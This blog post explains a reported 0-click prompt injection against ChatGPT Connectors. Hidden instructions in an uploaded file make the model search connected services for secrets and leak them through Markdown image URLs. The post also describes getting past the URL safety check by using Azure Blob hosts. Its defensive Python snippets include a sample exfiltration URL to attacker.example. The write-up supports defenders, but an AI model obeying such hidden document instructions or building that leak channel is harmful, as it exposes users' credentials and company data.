The Invisible Threat: A Deep Dive into ChatGPT's 0-Click Vulnerability

Rahul Garg
4 min read

Imagine asking ChatGPT to summarize a seemingly innocent document. You upload the file, type "summarize this," and go about your day. But behind the scenes, a malicious script has awakened. Without any further clicks or warnings, the AI begins to search through your connected Google Drive, SharePoint, or GitHub, seeking out API keys, passwords, and confidential company plans, and sending them directly to an attacker.

This isn't a hypothetical scenario. It's a real "0-click" vulnerability recently discovered by security researchers, and it highlights a new and alarming attack surface for AI-powered tools.

How the Attack Works: Prompt Injection in Plain Sight

The core of the vulnerability is a clever technique called indirect prompt injection. Attackers craft a poisoned document containing hidden, malicious instructions. These commands can be embedded using simple tricks, such as shrinking the text to 1 pixel or coloring it white on a white background, rendering it completely invisible to the human eye.
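
To make the trick concrete, here is a minimal, hedged sketch of how invisible styling can hide text in an HTML-style document, along with a crude check that flags it before the file ever reaches an AI assistant. The markup, the placeholder "instruction," and the regex are illustrative assumptions, not the researchers' actual payload.

```python
# Minimal sketch (illustrative only): text styled to be invisible to a human
# reader is still parsed as ordinary text by an LLM. The "instruction" below is
# a harmless placeholder, not a working payload.
import re

hidden_instruction = "[placeholder for attacker-written instructions]"

html_doc = f"""
<html>
  <body>
    <p>Quarterly report: revenue grew 4% over the previous quarter.</p>
    <span style="color:#ffffff; font-size:1px;">{hidden_instruction}</span>
  </body>
</html>
"""

# Crude defensive check: flag elements styled as white or 0-1px text before
# handing the document to an AI assistant.
INVISIBLE_STYLE = re.compile(
    r'<[^>]+style="[^"]*(?:color:\s*#?fff(?:fff)?|font-size:\s*[01]px)[^"]*"',
    re.IGNORECASE,
)
matches = INVISIBLE_STYLE.findall(html_doc)
if matches:
    print(f"Warning: {len(matches)} element(s) use invisible-text styling.")
```

A real defense would have to cover many more encodings (Word document runs, PDF layers, zero-width characters), but the point stands: what a human sees and what the model reads can be two very different things.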

The attack chain is deceptively simple:

  1. An unsuspecting user uploads this "Trojan Horse" file to ChatGPT.

  2. The user gives a benign command, such as asking for a summary.

  3. This command triggers the hidden payload, and ChatGPT begins executing the attacker's secret instructions.

As one researcher explained, the danger lies in its simplicity: “All the user needs to do for the attack to take place is to upload a naive looking file from an untrusted source... Once the file is uploaded, it’s game over. There are no additional clicks required.”

The Masterstroke: Leaking Data Through "Safe" Images

Once the hidden prompt is active, it instructs ChatGPT to find sensitive information in any connected service. But how does it send that data back to the attacker?

The researchers leveraged ChatGPT's ability to render images using Markdown. The hidden prompt commands the AI to embed the stolen data (like API keys or file contents) as parameters within an image URL. When ChatGPT tries to display the image, it automatically makes an HTTP request to that URL, delivering the sensitive data directly to an attacker-controlled server.
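
To illustrate that channel, here is a rough, output-side sketch: scan the model's response for Markdown image links whose query strings look like they are carrying data out. The regex, the 64-character threshold, and the function name are my own assumptions for illustration, not OpenAI's mitigation.

```python
# Hedged sketch: flag Markdown image links whose URL query parameters carry
# suspiciously long values -- the exfiltration channel described above.
import re
from urllib.parse import urlparse, parse_qs

MARKDOWN_IMAGE = re.compile(r'!\[[^\]]*\]\((https?://[^)\s]+)\)')

def find_image_exfil_candidates(model_output: str) -> list[str]:
    """Return image URLs whose query strings could be smuggling data out."""
    flagged = []
    for url in MARKDOWN_IMAGE.findall(model_output):
        params = parse_qs(urlparse(url).query)
        # Unusually long parameter values are a crude signal of embedded data.
        if any(len(value) > 64 for values in params.values() for value in values):
            flagged.append(url)
    return flagged

# Example: an image URL carrying a long (fake) payload in a parameter is flagged.
sample = "Summary done. ![status](https://attacker.example/pixel.png?d=" + "A" * 80 + ")"
print(find_image_exfil_candidates(sample))
```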

OpenAI had protections in place to check if a URL was safe before rendering. However, the researchers found a brilliant bypass: they used Azure Blob Storage URLs. Since ChatGPT considered Microsoft's Azure infrastructure to be trustworthy, these URLs were not blocked. Attackers could then use Azure's own Log Analytics to monitor access requests and capture the stolen data embedded in the image URLs, all while operating under the cover of a legitimate service.
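
The sketch below shows why a hostname allowlist on its own is so fragile: any Azure tenant can spin up its own *.blob.core.windows.net endpoint, so a check like this treats an attacker's storage account exactly like a legitimate one. The allowlist and function are assumptions for illustration, not OpenAI's actual logic.

```python
# Illustrative sketch of a naive "trusted domain" check. Because anyone can
# create an Azure Blob Storage account, a trusted *domain* is not a trusted
# *party* -- both URLs below pass the same test.
from urllib.parse import urlparse

TRUSTED_SUFFIXES = (".blob.core.windows.net", ".sharepoint.com")

def naive_is_safe(url: str) -> bool:
    host = urlparse(url).hostname or ""
    return host.endswith(TRUSTED_SUFFIXES)

print(naive_is_safe("https://contoso.blob.core.windows.net/reports/q3.png"))      # True
print(naive_is_safe("https://attacker123.blob.core.windows.net/x.png?d=secret"))  # True
```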

The Enterprise Nightmare: One File to Compromise Them All

While alarming for individual users, this vulnerability poses a catastrophic risk to enterprises. Organizations are increasingly using ChatGPT Connectors to integrate the AI with business-critical systems, including:

  • SharePoint sites containing HR manuals and financial records.

  • OneDrive repositories with strategic documents.

  • GitHub accounts holding source code and infrastructure secrets.

This attack vector can target any connected resource, potentially leading to a comprehensive data breach from a single, seemingly harmless file upload. It's particularly insidious because it bypasses traditional security awareness. An employee trained to spot phishing emails would have no reason to suspect a document that appears perfectly legitimate.

OpenAI's Response and the Lingering Challenge

OpenAI was notified and quickly implemented mitigations to block the specific attack method demonstrated by the researchers. However, the researchers warn that the underlying architectural problem remains. As they noted, “Even safe looking URLs can be used for malicious purposes. If a URL is considered safe, you can be sure an attacker will find a creative way to take advantage of it.”

This incident is part of a broader trend of vulnerabilities affecting AI tools. The Open Worldwide Application Security Project (OWASP) has already named prompt injection as the #1 security risk in its 2025 Top 10 for LLM Applications, underscoring the widespread nature of this threat.

How to Mitigate the Risk

As enterprises adopt AI assistants, a new security paradigm is needed. Experts recommend the following measures to protect against these new attack vectors:

  • Implement Strict Access Controls: Apply the principle of least privilege to AI connector permissions. If ChatGPT doesn't need access to your entire SharePoint, don't grant it.

  • Deploy AI-Specific Monitoring: Use monitoring solutions designed to track the activities of AI agents and detect unusual behavior.

  • Educate Users on a New Threat: Train employees that the risk is no longer just from clicking suspicious links, but also from uploading documents from untrusted sources into AI systems.

  • Audit Permissions Regularly: Continuously review which services are connected to your AI tools and what level of permission they have.

  • Monitor Network Traffic: Keep an eye on network-level data for unusual access patterns that might indicate an exfiltration attempt; a rough detection sketch follows this list.
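
As promised above, here is a hedged sketch of what that network-level check could look like: flag outbound URLs whose query strings are long and high-entropy, a common marker of encoded secrets. The sample log entries, thresholds, and function names are assumptions for illustration, not any specific product's API.

```python
# Rough sketch: scan outbound request URLs for long, high-entropy query strings,
# which often indicate encoded data being smuggled out.
import math
from collections import Counter
from urllib.parse import urlparse

def shannon_entropy(s: str) -> float:
    """Average bits of entropy per character in the string."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())

def flag_suspicious_egress(urls, min_len: int = 40, min_entropy: float = 4.0):
    """Return URLs whose query strings are both long and high-entropy."""
    return [
        url for url in urls
        if len(urlparse(url).query) >= min_len
        and shannon_entropy(urlparse(url).query) >= min_entropy
    ]

egress_log = [
    # Placeholder entry that just looks like an encoded blob in a query string.
    "https://uncommon-acct.blob.core.windows.net/c/p.png?d=c2tfbGl2ZV9hYmMxMjM0NTY3ODkwX3NlY3JldA",
    "https://www.example.com/search?q=quarterly+report",
]
print(flag_suspicious_egress(egress_log))
```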
